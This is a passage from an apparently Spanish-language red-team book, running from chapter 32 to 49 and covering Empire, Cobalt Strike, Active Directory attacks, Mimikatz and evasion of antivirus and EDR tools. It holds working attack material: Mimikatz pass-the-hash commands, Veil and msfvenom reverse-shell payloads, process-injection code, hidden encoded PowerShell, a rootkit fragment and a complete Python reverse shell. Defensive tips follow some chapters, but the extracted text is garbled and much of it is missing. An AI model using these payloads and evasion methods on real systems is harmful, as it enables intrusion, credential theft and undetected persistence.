Un Red Team no se limita a “tener un backdoor”. El verdadero reto es evadir los controles
defensivos:
● Evasión de AV/EDR:
○ Obfuscación de código (base64, XOR).
○ Uso de packers y loaders.
● Living Off The Land (LOLbins):
○ Uso de herramientas legítimas del sistema (PowerShell, Certutil, WMIC) para
ejecutar payloads.
● Fileless malware:
○ Ejecutar todo en memoria sin escribir en disco.
108
Al igual que el buffer overflow, comprender cómo funciona el malware ayuda a fortalecer
defensas:
Conclusión
El malware de Red Team es el fantasma controlado que se libera en la red corporativa para
medir la eficacia defensiva. No busca daño real, sino revelar brechas antes de que lo haga un
atacante verdadero. Aprender a construir, modificar y evadir con malware es entrar en la zona
gris del hacking ofensivo, donde la ética es la única barrera que separa al hacker del criminal.
Capítulo 33
¿Qué es Empire?
Empire es un framework de post-explotación orientado a Windows, escrito originalmente en
PowerShell y Python, que permite desplegar agentes (implantes) capaces de ejecutar una
amplia gama de tareas maliciosas controladas.
Arquitectura básica
109
Empire se compone de tres piezas:
Una vez dentro de la consola interactiva, se definen los listeners. Por ejemplo, un listener
HTTP:
uselistener http
set Host http://192.168.1.100
set Port 8080
execute
Ese monstruo en Base64 es el payload que, una vez ejecutado en la víctima, establece la
conexión con nuestro listener.
110
(Empire:AGENT001) > shell whoami
(Empire:AGENT001) > shell ipconfig /all
Ejemplo:
Técnicas de evasión
Empire no es invencible: cada día los EDRs mejoran su detección. Por eso, los equipos rojos
recurren a:
Conclusión
111
Empire convierte a Windows en un campo de juego del Red Team, ofreciendo un framework
de control total. Si Nmap y Metasploit son el machete y la escopeta, Empire es el trono oscuro
desde donde el atacante reina sobre la red comprometida.
Su verdadero poder está en combinarlo con ingeniería social, credenciales robadas y técnicas
de evasión, volviendo al adversario casi invisible.
Capítulo 34
La idea es clara: un pentester con Cobalt Strike no imita a un script kiddie, sino a un grupo
organizado con recursos, estrategia y técnicas realistas.
Red Team Operator → GUI (cliente) → Team Server → Beacons → Hosts comprometidos
Los beacons son la esencia del poder de Cobalt Strike: pequeños agentes diseñados para
sobrevivir, evadir y obedecer.
Tipos de Beacons
112
● DNS Beacons → camuflan el C2 en consultas DNS.
● SMB Beacons → permiten movimiento lateral en la red interna.
● Stagers/Stage-less → iniciales o autónomos, según la necesidad de sigilo.
beacon> sleep 60
Esto hace que la máquina víctima consulte el C2 cada minuto, evitando levantar sospechas con
tráfico constante.
O bien crear un documento malicioso, un script en PowerShell o una DLL. Todo con el objetivo
de colocar el beacon en la máquina víctima.
113
1. El atacante genera un payload beacon en un documento Word.
2. La víctima abre el documento → ejecución automática → el beacon se instala.
3. El beacon inicia comunicación con el Team Server vía HTTPS.
4. El Red Teamer recibe la conexión y comienza post-explotación.
5. Se expande lateralmente con beacon> jump psexec64.
Técnicas de evasión
Cobalt Strike es detectado por la mayoría de los EDR/AV, por eso el Red Team usa:
114
Conclusión
Cobalt Strike es la simulación más realista de un adversario avanzado. Para el Red Team es
un laboratorio de guerra cibernética; para el Blue Team, es un espejo de las amenazas más
serias en el mundo real.
Capítulo 35
● Usuarios y contraseñas.
● Políticas de grupo (GPO).
● Permisos de red y de archivos.
● Equipos y servidores unidos al dominio.
Para el Red Team, comprometer AD significa obtener control total sobre el reino digital:
acceso a datos sensibles, servidores críticos y credenciales privilegiadas.
115
1. Obtener credenciales privilegiadas (Admins de dominio).
2. Movilidad lateral para expandirse en la red.
3. Persistencia en el dominio (backdoors en GPO, golden tickets).
4. Exfiltración de datos críticos sin levantar sospechas.
1. Kerberoasting
El atacante obtiene un hash que luego puede romper con John the Ripper o Hashcat.
2. Pass-the-Hash (PtH)
sekurlsa::logonpasswords
sekurlsa::pth /user:Administrator /domain:empresa.local /ntlm:HASH
3. Pass-the-Ticket (PtT)
4. Over-Pass-the-Hash (Pass-the-Key)
116
● Con este, el atacante se vuelve dueño del dominio para siempre.
Ejemplo en Mimikatz:
7. DCSync Attack
● BloodHound usa gráficos para mostrar rutas de ataque dentro del dominio.
● Permite visualizar caminos desde un usuario común hasta Admin de Dominio.
SharpHound.exe -c All
117
♂ Escenarios prácticos
1. Un usuario con privilegios bajos en el dominio cae en un phishing.
○ El atacante roba su ticket Kerberos.
○ Usa BloodHound para encontrar una ruta hasta Domain Admin.
○ Escala privilegios con Kerberoasting.
2. Un atacante ya dentro de la red ejecuta un DCSync.
○ Obtiene el hash de KRBTGT.
○ Genera un Golden Ticket.
○ Control absoluto de AD sin importar cambios de contraseñas.
Defensa y detección
Los Blue Teams deben implementar:
Conclusión
Atacar Active Directory es como matar al dragón del reino. Una vez que un atacante tiene
control de AD, puede moverse con impunidad por toda la organización. Dominar estas técnicas
es fundamental para cualquier Red Teamer, pero también para un Blue Team que desee
defenderse de adversarios reales.
Capítulo 36
Kerberoasting y Pass-the-Hash
Introducción
118
En la guerra digital, no siempre es necesario romper muros a la fuerza: muchas veces basta con
aprovechar la confianza de los protocolos. Active Directory, con su complejo sistema de
autenticación basado en Kerberos y NTLM, ofrece oportunidades a los atacantes cuando se
abusa de esa confianza.
Dos técnicas letales —Kerberoasting y Pass-the-Hash (PtH)— permiten al Red Team extraer y
reutilizar credenciales sin que el usuario legítimo note nada. Este capítulo profundiza en cómo
funcionan, cómo se ejecutan en un laboratorio y cuáles son las defensas más efectivas.
El fundamento
Kerberos se basa en tickets (TGT y TGS). Cuando un usuario pide acceso a un servicio, recibe
un Service Ticket (TGS) cifrado con la clave del servicio (derivada de su contraseña). Un
atacante con privilegios de dominio puede solicitar tickets para cualquier cuenta de servicio
(Service Principal Name, SPN) y luego crackearlos offline.
119
El fundamento
Windows permite autenticarse con hashes NTLM en lugar de contraseñas en texto plano. El
problema: si un atacante roba el hash NTLM de un usuario (por ejemplo, de la memoria con
Mimikatz), puede usarlo directamente para moverse por la red.
120
Defensa contra Kerberoasting y PtH
Contra Kerberoasting
Contra Pass-the-Hash
Conclusión
Kerberoasting y Pass-the-Hash son armas silenciosas y devastadoras que muestran cómo la
autenticación en redes corporativas puede convertirse en la debilidad central de la
seguridad. Un Red Teamer debe dominarlas para demostrar el riesgo real, y un Blue Teamer
debe conocerlas para detener ataques antes de que se conviertan en catástrofe.
Capítulo 37
Introducción
En el universo del Red Team, pocas herramientas han alcanzado el estatus mítico de Mimikatz.
Creada por Benjamin Delpy, comenzó como un “experimento académico” y se convirtió en una
de las armas más usadas por grupos APT, pentesters y ciberdelincuentes. Su poder reside en la
capacidad de extraer credenciales directamente de la memoria del sistema, lo que rompe la
idea de que una contraseña cifrada es segura si ya se encuentra cargada en un proceso activo.
Este capítulo recorrerá las técnicas de credential dumping con Mimikatz, su uso en ataques
reales y las medidas defensivas más efectivas.
121
¿Qué es Credential Dumping?
El credential dumping es la práctica de extraer credenciales (contraseñas, hashes, tickets de
Kerberos, PINs, certificados) de la memoria de un sistema comprometido. En Windows, los
secretos viven en procesos como LSASS (Local Security Authority Subsystem Service),
donde se gestionan las autenticaciones y sesiones activas.
Capacidades principales
122
Escenario: El atacante compromete una máquina de un usuario con privilegios locales.
Aquí el atacante obtiene directamente la contraseña en texto plano y el hash NTLM del
administrador.
123
4. Seguridad en memoria: usar EDR/antivirus que detecten acceso a LSASS.
5. Rotación frecuente de contraseñas: mitiga el impacto de credenciales robadas.
6. Monitorización: eventos como la apertura de LSASS deben levantar alertas.
Conclusión
Mimikatz es la encarnación del poder ofensivo del Red Team: con un solo comando, se puede
desenmascarar todo el esquema de autenticación de Windows. Si en capítulos anteriores el
atacante avanzaba con golpes quirúrgicos, aquí se muestra cómo un único error en la defensa
puede abrir la caja fuerte completa de una organización.
Capítulo 38
Introducción
Si un atacante logra acceso remoto con Metasploit o un exploit personalizado, lo más probable
es que tarde o temprano choque contra un antivirus o EDR. Aquí es donde entra Veil, un
framework diseñado para generar payloads capaces de evadir mecanismos de detección
basados en firmas y heurísticas. La filosofía es clara: un buen payload no es solo efectivo,
también es invisible.
En este capítulo aprenderemos a usar Veil para crear backdoors indetectables, veremos
ejemplos prácticos y exploraremos las limitaciones de estas técnicas frente a defensas
modernas.
¿Qué es Veil-Evasion?
Veil es un framework de generación de payloads que permite:
124
Instalación de Veil en Kali Linux
En Kali viene preinstalado, pero si no:
sudo veil
Abrir Veil
veil
1.
Seleccionar payload
Dentro de Veil:
use 1
2. (ejemplo: python/meterpreter/rev_https)
Configurar parámetros
set LHOST 192.168.1.10
set LPORT 4444
3.
Generar payload
generate
Salida típica:
[*] Executable written to: /var/lib/veil/output/source/payload.exe
4.
Configurar el listener en Metasploit
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 192.168.1.10
set LPORT 4444
run
5.
125
Cuando la víctima ejecute payload.exe, el antivirus clásico no lo detectará, y se establecerá
una conexión reversa limpia.
✅Alta tasa de bypass en entornos corporativos donde los .exe levantan sospechas.
Técnicas de evasión
Veil no es magia negra, combina varias estrategias:
Limitaciones y contramedidas
126
Defensa contra Veil
● Habilitar Windows Defender ATP o EDR avanzados con detección en memoria.
● Limitar la ejecución de binarios no firmados.
● Implementar AppLocker o políticas de restricción de software.
● Revisar logs de PowerShell (Event ID 4104).
● Uso de honeypots: dejar binarios trampa para detectar actividad Red Team.
Conclusión
Veil es un recordatorio de que los payloads no necesitan ser ruidosos para ser letales. Con
unas pocas líneas de comando, un Red Team puede disfrazar un malware como un archivo
inocente, mientras el defensor solo ve silencio en los dashboards.
Capítulo 39
Introducción
127
La seguridad defensiva ha evolucionado: los viejos antivirus ya no son el enemigo principal,
ahora reinan los EDR (Endpoint Detection and Response). Estos sistemas no solo analizan
archivos, también vigilan procesos en memoria, comportamiento en tiempo real y patrones
de ataque.
Para un Red Teamer, evadirlos significa pensar como un cazador furtivo: nunca pisar la
trampa, nunca dejar rastro.
Ejemplo en Python:
import base64, os
code = "bXNmc2Vzc2lvbiA9ICJwYXlsb2FkIGdlbmVyYWRvIiA="
exec(base64.b64decode(code))
○
2. Empaquetadores (Packers)
○ Compresión o cifrado del binario con herramientas como UPX.
128
○ Desventaja: muchos AV detectan UPX → se usan packers personalizados.
3. Crypters
○ Encriptan payloads y los descifran en tiempo de ejecución.
Ejemplo en pseudo-C:
HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
LPVOID pRemote = VirtualAllocEx(hProc, NULL, size, MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProc, pRemote, shellcode, size, NULL);
CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)pRemote,
NULL, 0, NULL);
2. ✅El AV no ve archivos sospechosos en disco.
3. Living off the Land (LoL)
○ Usar herramientas nativas del sistema como powershell, mshta, rundll32,
regsvr32.
Ejemplo:
powershell -ExecutionPolicy Bypass -EncodedCommand <base64_payload>
○
4. → Nada de binarios extraños, solo PowerShell legítimo.
5. Evasión de Sandboxing
○ Muchos sandboxes ejecutan el payload solo unos segundos.
○ Truco: añadir sleep largo o detección de VM.
Sleep(60000); // 1 minuto
6.
7. Cifrado dinámico de shellcode
○ Cada vez que se genera, el payload usa un cifrado distinto.
○ Evita detección por firmas repetitivas.
129
Ejemplo práctico: Payload indetectable en PowerShell
Generar shellcode en Metasploit:
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.15
LPORT=4444 -f psh-cmd
1.
Insertar en script con ofuscación base64:
$e = "JABTA..." # base64 payload
powershell -nop -w hidden -e $e
2.
3. Ejecutar con -nop -w hidden → sin ventanas, sin políticas de ejecución.
Contramedidas modernas
● Defensa en profundidad: AV + EDR + SIEM + NIDS.
● Restricción de PowerShell (Constrained Language Mode).
● AppLocker / WDAC → bloquea ejecución de binarios no firmados.
● EDR con hooking avanzado para detectar API sospechosas.
● Honeypots en endpoints para detectar intrusos que buscan credenciales.
Conclusión
La evasión de AV y EDR es un juego del gato y el ratón:
El aprendizaje para el lector: no existe payload indetectable para siempre. Cada técnica tiene
fecha de caducidad, y la creatividad es la verdadera arma del atacante.
Capítulo 40
130
Introducción
Si el Red Team quiere realmente simular a un adversario avanzado, debe aprender a
esconderse después de comprometer un sistema. Ahí es donde entran los rootkits: piezas
de software diseñadas para alterar el comportamiento del sistema operativo y permanecer
ocultos, incluso frente a herramientas forenses y defensivas.
Un backdoor personalizado, en cambio, es una puerta trasera programada a medida que evita
las firmas y patrones de detección habituales.
#define _GNU_SOURCE
#include <dlfcn.h>
#include <dirent.h>
#include <string.h>
131
struct dirent *entry;
while ((entry = original_readdir(dirp))) {
if (strstr(entry->d_name, "malware") != NULL) continue; //
Oculta el proceso "malware"
return entry;
}
return NULL;
}
Compilación:
Ejecución:
LD_PRELOAD=./rootkit.so ls /proc
import socket,subprocess,os
s=socket.socket()
s.connect(("192.168.1.10",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
subprocess.call(["/bin/sh","-i"])
nc -lvp 4444
132
● Uso de certificados falsos para firmar binarios.
● Disfraz en servicios del sistema → "Windows Update Service" que en realidad es un
backdoor.
Este tipo de rootkits se compila como driver firmado, inyectándose a nivel kernel.
Técnicas avanzadas
1. Hooking de llamadas de sistema (syscall hooking).
2. Manipulación de tablas SSDT para alterar resultados de funciones del kernel.
3. Uso de DKOM (Direct Kernel Object Manipulation): alterar directamente estructuras
del kernel para ocultar procesos.
4. Firmware rootkits: modifican el código UEFI para reinfectar tras reinstalar el SO.
Conclusión
133
Los rootkits y backdoors son la cima del arte del camuflaje digital. No se trata solo de acceder
a un sistema, sino de hacerse invisible dentro de él. La defensa debe ser paranoica, porque
un sistema puede estar limpio en apariencia, pero controlado por completo en el subsuelo.
Capítulo 41
Introducción
Las redes inalámbricas son la arteria principal de la conectividad moderna, pero también son
un vector de ataque extremadamente fértil. El Red Team debe dominar tanto los métodos
tradicionales de explotación de redes Wi-Fi como las técnicas más modernas contra WPA3.
Un método más reciente evita incluso la espera del 4-way handshake. Se captura el PMKID del
AP directamente.
135
wifi.recon on
wifi.assoc BSSID
wifi.deauth BSSID
Una vez forzado el downgrade, el atacante puede volver a un ataque WPA2 clásico.
Contramedidas
● Usar WPA3 con SAE bien configurado (sin downgrade a WPA2).
● Desactivar WPS siempre.
● Contraseñas largas (mínimo 16 caracteres, no en diccionarios).
● Filtrado MAC no es suficiente (fácil de evadir).
● Monitoreo con WIDS/WIPS para detectar Evil Twins.
Conclusión
El Wi-Fi hacking es un clásico inmortal del Red Team, donde el atacante puede lograr acceso
inicial a toda una red corporativa a partir de un solo error en la seguridad inalámbrica. El juego
ha evolucionado: ya no se trata de romper WPA2 con rockyou.txt, sino de combinar
ataques PMKID, Evil Twin, y downgrade contra WPA3.
Capítulo 42
136
Introducción
Las redes Wi-Fi son uno de los objetivos favoritos de los equipos ofensivos. Mientras que en
capítulos anteriores vimos cómo romper WPA2/WPA3, en este capítulo nos centramos en un
enfoque diferente: no atacar la criptografía, sino al usuario.
Un Rogue Access Point es un punto de acceso no autorizado en una red corporativa, instalado
por un atacante o incluso por un empleado negligente. Un Evil Twin es una copia maliciosa de
un AP legítimo: mismo SSID, mismas características aparentes, pero controlado por el atacante.
La filosofía es simple:
1. Se levanta el AP malicioso.
2. Se redirige todo el tráfico HTTP a un servidor web local (Apache, Nginx).
3. Se presenta una página de login falsa (ejemplo: “Necesitas reautenticarte en la Wi-Fi de
la empresa”).
Ejemplo de redirección con iptables:
137
Evil Twin avanzado con Bettercap
Bettercap simplifica el ataque:
Esto no solo crea el AP malicioso, sino que también permite inspeccionar, modificar e
inyectar tráfico.
Escenarios de ataque
1. Oficina corporativa: Un Evil Twin imita la red oficial; usuarios distraídos ingresan sus
credenciales en el portal cautivo → robo directo de credenciales de Active Directory.
2. Cafetería pública: Se monta un AP “FreeWiFi” → robo de sesiones HTTP, capturas de
cookies, man-in-the-middle en redes sociales.
3. Hoteles y aeropuertos: Clientes que confían ciegamente en la red → robo masivo de
datos de conexión y potencial instalación de malware vía payloads descargados
automáticamente.
Contramedidas
138
● WIDS/WIPS (Wireless Intrusion Detection/Prevention Systems): sistemas que
detectan APs falsos.
● Validación de certificados en portales cautivos: no aceptar páginas HTTP sin
HTTPS.
● Deshabilitar autoconexión automática a redes conocidas en los dispositivos.
● Educar a usuarios: la capa humana es el eslabón más débil.
● 802.1X + EAP-TLS: autenticación basada en certificados, mucho más resistente a
ataques Evil Twin.
Conclusión
Los Rogue APs y Evil Twins son una de las armas más efectivas del arsenal Red Team porque
explotan el eslabón humano. El atacante no necesita descifrar WPA2 ni WPA3: solo necesita
engañar al usuario para que entregue voluntariamente sus credenciales.
En entornos corporativos, un Evil Twin bien armado puede equivaler a un acceso inicial directo
al Active Directory.
Capítulo 43
Bluetooth Hacking
Introducción
Bluetooth nació en los 90 como un estándar para reemplazar cables. Hoy es un protocolo
complejo con múltiples perfiles y capas, pero con una seguridad que muchas veces queda
relegada frente a Wi-Fi. Los ataques Bluetooth tienen algo especial: no necesitan Internet ni
infraestructura de red corporativa, solo proximidad física. Eso lo hace perfecto para ataques
sigilosos en campo.
Ejemplo:
hcitool scan
139
Esto devuelve direcciones MAC y nombres de los dispositivos.
Con btscanner podemos obtener más información: fabricante, servicios activos, versión del
firmware.
Técnicas de ataque
1. Bluesnarfing
Esto extrae los primeros 100 contactos del teléfono con MAC indicada.
2. Bluebugging
Permite tomar control del dispositivo objetivo (enviar comandos AT, iniciar llamadas, mandar
SMS). Un atacante podría incluso activar el micrófono del smartphone sin que el usuario lo note.
Muchos sistemas manos libres de autos no piden PIN o lo usan por defecto (0000, 1234). Con
Carwhisperer se puede inyectar audio o grabar conversaciones dentro del vehículo.
140
4. Bluetooth Low Energy (BLE) Attacks
BLE se usa en relojes inteligentes, cerraduras electrónicas, sensores IoT y dispositivos médicos.
Con crackle y bettercap, un atacante puede:
5. Blueborne Attack
Una vulnerabilidad famosa (2017) que permitía ejecutar código remoto en Android, Windows,
Linux e iOS simplemente por tener Bluetooth activo, sin emparejamiento previo. Lección
aprendida: Bluetooth expone una superficie de ataque inmensa y transversal.
Contramedidas
● Desactivar Bluetooth cuando no se use (especialmente en móviles).
● Evitar PIN por defecto y forzar emparejamientos seguros.
● Monitoreo BLE en entornos críticos con herramientas de detección.
● Segmentación de IoT/BLE en redes aisladas para reducir impacto.
● Actualizar firmware de dispositivos con parches de seguridad.
141
Conclusión
El Bluetooth Hacking demuestra que el campo de batalla del Red Team no se limita a
servidores y Wi-Fi: está en cada auricular, en cada auto conectado, en cada dispositivo IoT que
llevamos en el bolsillo. Un atacante con un simple adaptador Bluetooth y un portátil con Kali
puede obtener acceso a información sensible, control de dispositivos o espionaje en
tiempo real.
Capítulo 44
Introducción
Si el Wi-Fi y el Bluetooth representan la periferia inmediata, las redes GSM, 3G, 4G e incluso
5G son la columna vertebral de la comunicación humana moderna. Teléfonos, mensajes SMS,
aplicaciones de autenticación en dos pasos, banca móvil: todo pasa por el aire. Y ese aire, si se
sabe escuchar, revela secretos.
La seguridad móvil ha evolucionado, pero también lo han hecho las técnicas de intercepción. En
este capítulo exploraremos cómo un Red Team furioso puede espiar llamadas, descifrar SMS
o manipular tráfico 4G, con las mismas armas que usan agencias de inteligencia y
cibercriminales.
142
Reconocimiento de redes móviles
Para un atacante, el primer paso es escuchar el espectro radioeléctrico. Esto se hace con
hardware y software especializado.
Hardware típico:
Técnicas de ataque
Un IMSI Catcher es una falsa estación base que obliga a los teléfonos cercanos a conectarse,
revelando su IMSI (International Mobile Subscriber Identity). Esto permite:
Captura tráfico GSM en crudo. Luego, con gr-gsm y Wireshark, se puede descifrar llamadas o
SMS si el cifrado A5/1 es usado (y crackeado con tablas Rainbow).
grgsm_livemon -f 941.8M
143
3. Ataques de Downgrade (4G a 2G)
Aunque 4G es más seguro, los atacantes pueden forzar a un móvil a conectarse a una torre
falsa que solo soporte 2G. Una vez en GSM, el cifrado débil vuelve el tráfico vulnerable.
4. Intercepción de SMS
Un Red Team puede interceptar mensajes de autenticación en dos pasos (2FA) enviados por
SMS. El tráfico capturado se procesa con Kraken o Hashcat para romper el cifrado A5/1.
● Interceptar 2FA vía SMS → un atacante cerca de la víctima captura el código enviado
por su banco.
● Identificación de líderes en protestas → uso de IMSI Catchers para registrar qué SIMs
están presentes.
● Espionaje corporativo → escucha de llamadas de ejecutivos al viajar en países con
redes GSM inseguras.
● Ataques de manipulación → redirigir llamadas o falsificar SMS usando estaciones base
falsas.
Contramedidas
● Deshabilitar 2G en el dispositivo cuando sea posible (algunos smartphones modernos
lo permiten).
● Uso de cifrado extremo a extremo (Signal, WhatsApp, etc.) en lugar de SMS o
llamadas nativas.
● Firewalls de telecomunicaciones que detecten IMSI Catchers y anomalías de señal.
144
● Tarjetas SIM con soporte para algoritmos más robustos (A5/3, MILENAGE).
● Monitoreo del espectro en eventos sensibles para detectar estaciones base falsas.
Conclusión
El hacking de GSM y 4G no es un mito: es el mismo arte que usan agencias de inteligencia,
cuerpos policiales y cibercriminales de alto nivel. Para un Red Team, dominar estas técnicas
significa tener control sobre la capa más profunda de la comunicación humana: la voz y
los mensajes que cruzan el aire.
Con hardware relativamente accesible y software libre, el atacante puede montar un laboratorio
capaz de simular estaciones base, interceptar comunicaciones y demostrar la fragilidad de
confiar ciegamente en las redes móviles.
La máxima queda clara: la seguridad que depende solo del aire es humo.
Capítulo 45
Introducción
Android es el sistema operativo dominante en el mundo móvil. Su ecosistema abierto,
fragmentado y profundamente integrado en la vida cotidiana lo convierten en un blanco
constante. Desde banca móvil, mensajería corporativa, aplicaciones de salud hasta el
control de IoT y autos inteligentes, Android es la puerta de entrada al alma digital del usuario.
Un Red Team que ignore Android está ciego frente a uno de los vectores de ataque más
críticos. En este capítulo aprenderemos cómo montar un laboratorio de pentesting móvil, cómo
obtener acceso a un dispositivo, y qué herramientas usar para recolectar, manipular y exfiltrar
información sensible.
● Emuladores:
○ Android Studio Emulator
145
○ Genymotion (muy usado en pentesting)
● Dispositivos reales rooteados (recomendado para pruebas reales).
● Herramientas clave:
○ ADB (Android Debug Bridge) → comunicación con dispositivos.
○ Frida → hooking dinámico en aplicaciones.
○ Drozer → framework para pentesting Android.
○ APKTool → decompilar/recompilar aplicaciones.
○ MobSF (Mobile Security Framework) → análisis estático y dinámico de apps.
Análisis de aplicaciones
● Estático:
Usar APKTool para decompilar:
apktool d base.apk
○ Esto permite ver el manifiesto y código smali.
○ Usar MobSF para escaneo rápido de vulnerabilidades (hardcoded keys,
permisos peligrosos, endpoints expuestos).
● Dinámico:
Inyectar código con Frida para interceptar funciones sensibles:
frida -U -f com.banco.app -l hook.js --no-pause
○
○ Manipular tráfico de apps móviles con Burp Suite + certificado CA instalado
en el dispositivo.
146
Técnicas de ataque
1. Inseguridad en almacenamiento
2. Intercepción de tráfico
Con un proxy (Burp Suite) y un dispositivo configurado, se pueden capturar credenciales, tokens
y APIs internas. Si la app no valida certificados SSL correctamente, es vulnerable a MITM.
5. Root y Post-explotación
147
● Compromiso de apps bancarias: interceptando tokens y manipulando transacciones
vía MITM.
● Corporate espionage: extracción de correos y documentos desde aplicaciones de
trabajo.
● Ataque físico: conexión rápida por ADB en dispositivos con USB Debugging activo.
● Fraude publicitario: apps maliciosas que inyectan clics falsos.
Contramedidas
● Encriptar almacenamiento interno y no usar SharedPreferences para datos sensibles.
● Implementar certificate pinning para evitar MITM.
● Ofuscar código con ProGuard o R8.
● Revisar permisos y aplicar el principio de mínimo privilegio.
● Monitoreo MDM (Mobile Device Management) en entornos corporativos.
Conclusión
El pentesting en Android revela la fragilidad de los sistemas que cargamos en el bolsillo. Un Red
Team que domina estas técnicas puede demostrar cómo un simple móvil comprometido
equivale a comprometer la vida entera de un usuario o la seguridad de una empresa.
El mensaje es claro: Android es un campo de batalla en el que cada aplicación mal diseñada
puede abrir una brecha monumental.
Capítulo 46
Pentesting en iOS
Introducción
iOS, el sistema operativo de Apple, se vende al mundo como un entorno hermético, pulcro y
seguro. Sus mecanismos de sandboxing, el App Store controlado y el cifrado por hardware
hacen que muchos crean que es inviolable. Pero ningún castillo es inexpugnable: la historia está
llena de jailbreaks, exploits de día cero y ataques de ingeniería inversa que han demostrado que
incluso la manzana más brillante puede pudrirse por dentro.
148
En este capítulo vamos a descender al oscuro arte del pentesting en iOS, explorando
herramientas, vectores de ataque y escenarios donde un Red Team puede demostrar que la
seguridad absoluta no existe.
Preparando el laboratorio
Pentestear en iOS requiere superar su naturaleza cerrada. Dos caminos principales:
1. Dispositivos jailbroken
○ Permiten instalar binarios externos y acceder a carpetas internas.
○ Usar herramientas como Cydia, Sileo y checkra1n para liberar el dispositivo.
Herramientas clave:
149
3. Análisis dinámico con Frida / objection
Ejemplo: bypass de jailbreak detection.
frida -U -n AppName -l bypass.js
○
Técnicas de ataque
Muchas apps incluyen defensas como jailbreak detection, certificate pinning o root detection.
Con objection:
Luego:
Con cycript o Frida, es posible alterar funciones internas en tiempo real. Ejemplo: forzar a una
app de banca a mostrar saldos falsos en la pantalla.
150
5. Post-explotación en iOS
Contramedidas
● Uso de certificate pinning reforzado (con librerías actualizadas).
● Revisar jailbreak detection, implementando múltiples técnicas.
● Cifrar correctamente datos en reposo y nunca almacenar credenciales en texto plano.
● Deploy seguro de apps: revisar binarios con escaneos estáticos y dinámicos.
● Implementar MDM fuerte para entornos corporativos.
Conclusión
iOS no es el muro indestructible que Apple vende. Es más difícil de atacar que Android, sí, pero
en las manos correctas, un Red Team puede romper la jaula dorada y exponer secretos igual
de sensibles.
151
Capítulo 47
Introducción
En el corazón del hacking ético existe un choque eterno: el Red Team contra el Blue Team.
● El Red Team encarna la mentalidad ofensiva: piensan como atacantes, buscan grietas,
rompen sistemas, fuerzan lo imposible.
● El Blue Team representa la defensa: vigilan, detectan anomalías, refuerzan el castillo,
mitigan ataques y responden a incidentes.
Este enfrentamiento no es un simple juego de rol: en la práctica, es un campo de
entrenamiento realista para organizaciones enteras, donde se ponen a prueba personas,
procesos y tecnología.
152
○ Ataques Wi-Fi o USB drop.
3. Defensa activa (Blue)
○ Monitoreo de logs y alertas SIEM.
○ Correlación de tráfico sospechoso.
○ Identificación de anomalías en endpoints.
4. Movimiento lateral y persistencia (Red)
○ Uso de pivoting, escalada de privilegios y exfiltración lenta de datos.
5. Contención y respuesta (Blue)
○ Bloqueo de C2.
○ Revocación de credenciales comprometidas.
○ Aislamiento de máquinas infectadas.
6. Informe y lecciones aprendidas (ambos)
○ El Red Team expone cómo entró, qué vulnerabilidades explotó.
○ El Blue Team documenta cómo respondió, qué logró detener y qué pasó por alto.
Escenarios realistas
1. Phishing corporativo
2. Ataque físico
3. Ataque Wi-Fi
5. Exfiltración encubierta
153
Incorporando el Purple Team
Cuando el Red y el Blue trabajan juntos, nace el Purple Team.
Herramientas clave
● Para Red Team: Metasploit, Cobalt Strike, Empire, BloodHound, Nmap, Burp Suite.
● Para Blue Team: SIEM (Splunk, ELK, QRadar), EDR (CrowdStrike, SentinelOne),
IDS/IPS (Snort, Suricata), honeypots.
● Para Purple Team: frameworks como MITRE ATT&CK, CALDERA o Atomic Red Team.
Conclusión
Los ejercicios Red vs Blue no son un lujo: son la forma más realista de probar una organización
contra ataques modernos. Un Red Team furioso sin un Blue que lo desafíe es solo un ataque
simulado incompleto. Y un Blue Team sin Red es un ejército que nunca entrenó contra el
enemigo.
Capítulo 48
Introducción
El phishing no es un simple correo trucho con faltas de ortografía. En el ecosistema de un Red
Team moderno, se convierte en una operación orquestada, con infraestructura propia,
plantillas realistas, métricas de éxito y explotación de la ingeniería social más oscura.
154
Los frameworks como GoPhish y el Social-Engineer Toolkit (SET) permiten a los pentesters
desplegar campañas masivas con el realismo de un ciberdelincuente de élite. Su poder está en
la automatización: crear, enviar, monitorear y comprometer a cientos de usuarios con unos
pocos comandos.
155
Ejecución inicial:
setoolkit
1.
2. Menú principal:
○ Spear Phishing Attacks
○ Website Attack Vectors
○ Infectious Media Generator
○ Wireless Access Point Attack
3. Website Attack Vector → Credential Harvester
● Correo phishing masivo: “Tu cuenta de Microsoft caducará, haz clic aquí”.
● Página clonada con GoPhish: idéntica al login real de O365.
● Victimas: 20 empleados hacen clic, 6 entregan credenciales.
● Red Team: usa las credenciales para acceder a correos internos y pivotar hacia datos
sensibles.
156
● Blue Team: si es lento en detectar, la brecha escala a compromiso completo de
dominio.
Conclusión
El phishing es la puerta de entrada número uno en la mayoría de incidentes reales. GoPhish y
SET permiten a un Red Team replicar ataques a escala masiva, medir vulnerabilidades
humanas y demostrar a las organizaciones que la seguridad no es solo cuestión de firewalls,
sino de conciencia y preparación.
Un empleado distraído puede ser la chispa que encienda el incendio. El rol del Red Team es
encender esa chispa en laboratorio, para que en la vida real el Blue Team esté listo con los
extintores.
Capítulo 49
Introducción
La nube prometía seguridad y escalabilidad, pero la realidad es que la mayoría de las brechas
ocurren por errores humanos: configuraciones débiles, credenciales expuestas, excesivos
privilegios. Para un Red Team, abusar de servicios cloud no significa “romper” la infraestructura,
sino aprovechar la negligencia de los administradores y la complejidad de entornos híbridos.
Los gigantes AWS, Azure y GCP concentran la información y los procesos de miles de
corporaciones. Un solo descuido puede equivaler a dejar la puerta del castillo abierta en
medio de la tormenta.
157
Reconocimiento en la nube
1. Búsqueda de credenciales expuestas:
○ Claves de AWS en repositorios de GitHub.
○ Archivos .aws/credentials olvidados en servidores públicos.
○ Variables de entorno filtradas en contenedores.
Ejemplo:
aws s3 ls s3://bucket-vulnerable --no-sign-request
○
○ Herramientas: s3scanner, ScoutSuite.
● IAM con privilegios excesivos:
○ Cuentas con AdministratorAccess innecesaria.
○ Ataque clásico: Privilege Escalation creando un nuevo usuario con permisos
totales.
● Abuso de Lambda Functions:
○ Subida de payloads maliciosos en funciones sin validación.
○ Ejecución remota de código al estilo “cloud shell”.
